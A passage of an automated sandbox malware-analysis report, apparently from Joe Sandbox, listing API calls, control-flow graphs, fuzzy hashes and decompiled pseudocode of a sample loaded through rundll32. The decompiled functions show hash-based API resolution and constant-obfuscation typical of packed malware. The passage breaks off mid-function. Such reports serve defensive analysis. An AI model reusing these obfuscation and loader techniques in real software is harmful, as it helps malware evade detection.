                                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                          • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                          • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2714421763-0
                                                                                                                          • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                          • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                          • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                          • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                          • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                          • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                          • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                          • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$CreateDestroy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3296620671-0
                                                                                                                          • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                          • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                          • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                          • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 252 10001a2c-10001a4e VirtualAlloc 250->252 253 10001a7e 250->253 255 10001a50-10001a52 252->255 256 10001a57-10001a7b call 100017c0 252->256 253->246 255->251 256->253 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                          • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                          • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                          • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 275 797f5d-797ff1 call 7a20b9 call 7aaa30 CreateProcessW
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0079AD99,?,?,?,181C8C04,0079AD99), ref: 00797FEB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                          • Instruction ID: 1e1d45e4a4569a1f9a92cb2215ead8a41b3d1c965aefd684e07f88587ef44c56
                                                                                                                          • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                          • Instruction Fuzzy Hash: B811D672402118FBDF619F95DD09CDF7F79EF0A3A4F149244F91921121D3768A60EBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 280 7a46bb-7a473b call 7a20b9 call 7aaa30 SHGetFolderPathW
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E007A46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				void* _t21;
                                                                                                                          				intOrPtr* _t25;
                                                                                                                          				void* _t26;
                                                                                                                          
                                                                                                                          				E007A20B9(_t21);
                                                                                                                          				_v20 = 0x3f5bb0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v12 = 0x996874;
                                                                                                                          				_v12 = _v12 << 0xf;
                                                                                                                          				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                          				_v8 = 0xebf0af;
                                                                                                                          				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                          				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                          				_t25 = E007AAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                          				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                          				return _t26;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 007A4735
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1514166925-0
                                                                                                                          • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                          • Instruction ID: 0d5677afc85f2c1c96b4dba0fb90b0a5b219106ff74724f31f8ff9de9b1e451a
                                                                                                                          • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                          • Instruction Fuzzy Hash: 54012C75801218FBCF15AFD5DC098DFBFB8EF45394F108145F91826212D2758A60DBD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 285 7993ed-799461 call 7aaa30 ExitProcess
                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E007993ED() {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				intOrPtr _t24;
                                                                                                                          
                                                                                                                          				_v28 = 0xda6c64;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v12 = 0x88a564;
                                                                                                                          				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                          				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                          				_v8 = 0xd9241f;
                                                                                                                          				_v8 = _v8 * 0x5c;
                                                                                                                          				_v8 = _v8 + 0xccdd;
                                                                                                                          				_v8 = _v8 + 0x903;
                                                                                                                          				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                          				E007AAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                          				ExitProcess(0);
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNELBASE(00000000), ref: 0079945B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                          • Instruction ID: 96a8f1e358ed3de6f80c1b8446f1aca97c586308450b8023066526d757505614
                                                                                                                          • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                          • Instruction Fuzzy Hash: E6F03C71D01308FBEB44DBE8DA4699DFBF4EB50314F2081A9D604B3261E7745F459B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 305 79b23c-79b2c6 call 7a20b9 call 7aaa30 lstrcmpiW
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E0079B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _t27;
                                                                                                                          				int _t32;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t27);
                                                                                                                          				_v12 = 0x6268;
                                                                                                                          				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                          				_v12 = _v12 + 0xffff2919;
                                                                                                                          				_v12 = _v12 + 0xffff3e3d;
                                                                                                                          				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                          				_v8 = 0xa46433;
                                                                                                                          				_v8 = _v8 + 0x98ba;
                                                                                                                          				_v8 = _v8 | 0xc390ebe9;
                                                                                                                          				_v8 = _v8 + 0xd5b0;
                                                                                                                          				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                          				E007AAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                          				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                          				return _t32;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0079B2C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1586166983-0
                                                                                                                          • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                          • Instruction ID: 7cf91498d9b2ac2057180634c5c764604e6d35dfbe4c9fdc21f5b3c40ab19c42
                                                                                                                          • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                          • Instruction Fuzzy Hash: D60116B2C04608FFDF45DFD4DD468AEBBB5EB45304F208188B90566262E3768B61AB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E007AE395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
                                                                                                                          				signed int _v4;
                                                                                                                          				signed int* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				signed int _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v172;
                                                                                                                          				signed int _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				signed int _v184;
                                                                                                                          				signed int _v188;
                                                                                                                          				signed int _v192;
                                                                                                                          				signed int _v196;
                                                                                                                          				signed int _v200;
                                                                                                                          				signed int _v204;
                                                                                                                          				signed int _v208;
                                                                                                                          				signed int _v212;
                                                                                                                          				signed int _v216;
                                                                                                                          				signed int _v220;
                                                                                                                          				signed int _v224;
                                                                                                                          				signed int _v228;
                                                                                                                          				signed int _v232;
                                                                                                                          				signed int _v236;
                                                                                                                          				signed int _v240;
                                                                                                                          				signed int _v244;
                                                                                                                          				signed int _v248;
                                                                                                                          				signed int _v252;
                                                                                                                          				signed int _v256;
                                                                                                                          				signed int _v260;
                                                                                                                          				signed int _v264;
                                                                                                                          				signed int _v268;
                                                                                                                          				signed int _v272;
                                                                                                                          				intOrPtr _v276;
                                                                                                                          				signed int _v280;
                                                                                                                          				signed int _v284;
                                                                                                                          				signed int _v288;
                                                                                                                          				signed int _t823;
                                                                                                                          				void* _t829;
                                                                                                                          				signed int* _t832;
                                                                                                                          				signed int _t833;
                                                                                                                          				signed int _t845;
                                                                                                                          				signed int _t858;
                                                                                                                          				signed int _t862;
                                                                                                                          				intOrPtr _t868;
                                                                                                                          				signed int _t888;
                                                                                                                          				void* _t939;
                                                                                                                          				void* _t948;
                                                                                                                          				signed int _t956;
                                                                                                                          				signed int _t957;
                                                                                                                          				signed int _t958;
                                                                                                                          				signed int _t959;
                                                                                                                          				signed int _t960;
                                                                                                                          				signed int _t961;
                                                                                                                          				signed int _t962;
                                                                                                                          				signed int _t963;
                                                                                                                          				signed int _t964;
                                                                                                                          				signed int _t965;
                                                                                                                          				signed int _t966;
                                                                                                                          				signed int _t967;
                                                                                                                          				signed int _t968;
                                                                                                                          				signed int _t969;
                                                                                                                          				signed int _t970;
                                                                                                                          				signed int _t971;
                                                                                                                          				signed int _t972;
                                                                                                                          				signed int _t973;
                                                                                                                          				signed int _t974;
                                                                                                                          				signed int _t975;
                                                                                                                          				signed int _t976;
                                                                                                                          				signed int _t977;
                                                                                                                          				signed int _t981;
                                                                                                                          				signed int _t984;
                                                                                                                          				signed int _t985;
                                                                                                                          				signed int* _t988;
                                                                                                                          				void* _t991;
                                                                                                                          
                                                                                                                          				_push(_a44);
                                                                                                                          				_v4 = __ecx;
                                                                                                                          				_push(_a40);
                                                                                                                          				_v8 = __edx;
                                                                                                                          				_push(_a36);
                                                                                                                          				_push(_a32);
                                                                                                                          				_push(_a28);
                                                                                                                          				_push(_a24);
                                                                                                                          				_push(_a20);
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx & 0x0000ffff);
                                                                                                                          				E007A20B9(__ecx & 0x0000ffff);
                                                                                                                          				_v284 = 0x99c43c;
                                                                                                                          				_t988 =  &(( &_v288)[0xd]);
                                                                                                                          				_v284 = _v284 + 0xbb14;
                                                                                                                          				_v284 = _v284 >> 0xb;
                                                                                                                          				_v284 = _v284 ^ 0x0000134f;
                                                                                                                          				_t862 = 0;
                                                                                                                          				_v120 = 0x27310;
                                                                                                                          				_t977 = 0x329d839;
                                                                                                                          				_t956 = 0x43;
                                                                                                                          				_v120 = _v120 / _t956;
                                                                                                                          				_v120 = _v120 + 0xe2f5;
                                                                                                                          				_v120 = _v120 ^ 0x0000ec43;
                                                                                                                          				_v36 = 0x50046c;
                                                                                                                          				_v36 = _v36 << 1;
                                                                                                                          				_v36 = _v36 ^ 0x00a00810;
                                                                                                                          				_v116 = 0x7f268a;
                                                                                                                          				_v116 = _v116 ^ 0x5f915552;
                                                                                                                          				_t957 = 0x1b;
                                                                                                                          				_v276 = 0;
                                                                                                                          				_v116 = _v116 * 0x3e;
                                                                                                                          				_v116 = _v116 ^ 0x3bc08e50;
                                                                                                                          				_v228 = 0xb299e8;
                                                                                                                          				_v228 = _v228 >> 0xe;
                                                                                                                          				_v228 = _v228 << 0x10;
                                                                                                                          				_v228 = _v228 * 0x42;
                                                                                                                          				_v228 = _v228 ^ 0xb8144000;
                                                                                                                          				_v64 = 0x620921;
                                                                                                                          				_v64 = _v64 | 0xbe88b167;
                                                                                                                          				_v64 = _v64 ^ 0xbeaab967;
                                                                                                                          				_v172 = 0xae09b0;
                                                                                                                          				_v172 = _v172 | 0xde677f7d;
                                                                                                                          				_v172 = _v172 ^ 0xc5d04777;
                                                                                                                          				_v172 = _v172 ^ 0x1b3b388a;
                                                                                                                          				_v132 = 0xc06abb;
                                                                                                                          				_v132 = _v132 ^ 0x2b7b17d1;
                                                                                                                          				_v132 = _v132 / _t957;
                                                                                                                          				_v132 = _v132 ^ 0x059ea5d4;
                                                                                                                          				_v236 = 0x9fdac6;
                                                                                                                          				_v236 = _v236 >> 4;
                                                                                                                          				_v236 = _v236 + 0x9b65;
                                                                                                                          				_v236 = _v236 * 0x7b;
                                                                                                                          				_v236 = _v236 ^ 0x051f8b2b;
                                                                                                                          				_v108 = 0xc74878;
                                                                                                                          				_v108 = _v108 + 0x314b;
                                                                                                                          				_v108 = _v108 * 0x41;
                                                                                                                          				_v108 = _v108 ^ 0x32a5e883;
                                                                                                                          				_v196 = 0x1587ec;
                                                                                                                          				_v196 = _v196 ^ 0x07496474;
                                                                                                                          				_v196 = _v196 >> 7;
                                                                                                                          				_t958 = 0x2c;
                                                                                                                          				_v196 = _v196 / _t958;
                                                                                                                          				_v196 = _v196 ^ 0x000054ad;
                                                                                                                          				_v244 = 0xbebf62;
                                                                                                                          				_v244 = _v244 << 0xb;
                                                                                                                          				_v244 = _v244 + 0xffffca16;
                                                                                                                          				_v244 = _v244 << 0xe;
                                                                                                                          				_v244 = _v244 ^ 0x36858000;
                                                                                                                          				_v72 = 0x750de5;
                                                                                                                          				_v72 = _v72 | 0xb336b270;
                                                                                                                          				_v72 = _v72 ^ 0xb377bff5;
                                                                                                                          				_v256 = 0xc175fb;
                                                                                                                          				_t984 = 0x72;
                                                                                                                          				_t959 = 0x28;
                                                                                                                          				_v256 = _v256 * 0x26;
                                                                                                                          				_v256 = _v256 >> 5;
                                                                                                                          				_v256 = _v256 ^ 0xfb5a89da;
                                                                                                                          				_v256 = _v256 ^ 0xfbbf3581;
                                                                                                                          				_v76 = 0x1a7820;
                                                                                                                          				_v76 = _v76 | 0xb8d3f172;
                                                                                                                          				_v76 = _v76 ^ 0xb8dbf96d;
                                                                                                                          				_v224 = 0x97ff87;
                                                                                                                          				_v224 = _v224 / _t984;
                                                                                                                          				_v224 = _v224 >> 6;
                                                                                                                          				_v224 = _v224 * 0x5d;
                                                                                                                          				_v224 = _v224 ^ 0x0001effe;
                                                                                                                          				_v40 = 0x7c0450;
                                                                                                                          				_v40 = _v40 / _t959;
                                                                                                                          				_v40 = _v40 ^ 0x000319b6;
                                                                                                                          				_v136 = 0x260fad;
                                                                                                                          				_v136 = _v136 + 0x622a;
                                                                                                                          				_t960 = 0x1c;
                                                                                                                          				_v136 = _v136 / _t960;
                                                                                                                          				_v136 = _v136 ^ 0x00015e7e;
                                                                                                                          				_v288 = 0x61f743;
                                                                                                                          				_t961 = 0x66;
                                                                                                                          				_v288 = _v288 * 0x25;
                                                                                                                          				_v288 = _v288 ^ 0x0e2ee817;
                                                                                                                          				_v288 = 0x858eca;
                                                                                                                          				_v288 = _v288 / _t984;
                                                                                                                          				_v288 = _v288 ^ 0x0002de1a;
                                                                                                                          				_v280 = 0xcba1b8;
                                                                                                                          				_v280 = _v280 / _t961;
                                                                                                                          				_v280 = _v280 ^ 0xc2211053;
                                                                                                                          				_v280 = _v280 + 0xffff75b7;
                                                                                                                          				_v280 = _v280 ^ 0xc2279606;
                                                                                                                          				_v288 = 0x614b46;
                                                                                                                          				_v288 = _v288 >> 4;
                                                                                                                          				_v288 = _v288 ^ 0x000cf9c3;
                                                                                                                          				_v288 = 0x794624;
                                                                                                                          				_v288 = _v288 + 0xb4d0;
                                                                                                                          				_v288 = _v288 ^ 0x0072cd5b;
                                                                                                                          				_v288 = 0xcdbe83;
                                                                                                                          				_v288 = _v288 >> 0xf;
                                                                                                                          				_v288 = _v288 ^ 0x00034ad6;
                                                                                                                          				_v288 = 0x24639d;
                                                                                                                          				_t962 = 0x28;
                                                                                                                          				_v288 = _v288 / _t962;
                                                                                                                          				_v288 = _v288 ^ 0x000e4507;
                                                                                                                          				_v288 = 0x4730ec;
                                                                                                                          				_t963 = 0x21;
                                                                                                                          				_v288 = _v288 / _t963;
                                                                                                                          				_v288 = _v288 ^ 0x0002fb4b;
                                                                                                                          				_v284 = 0xb301d9;
                                                                                                                          				_t964 = 0x4e;
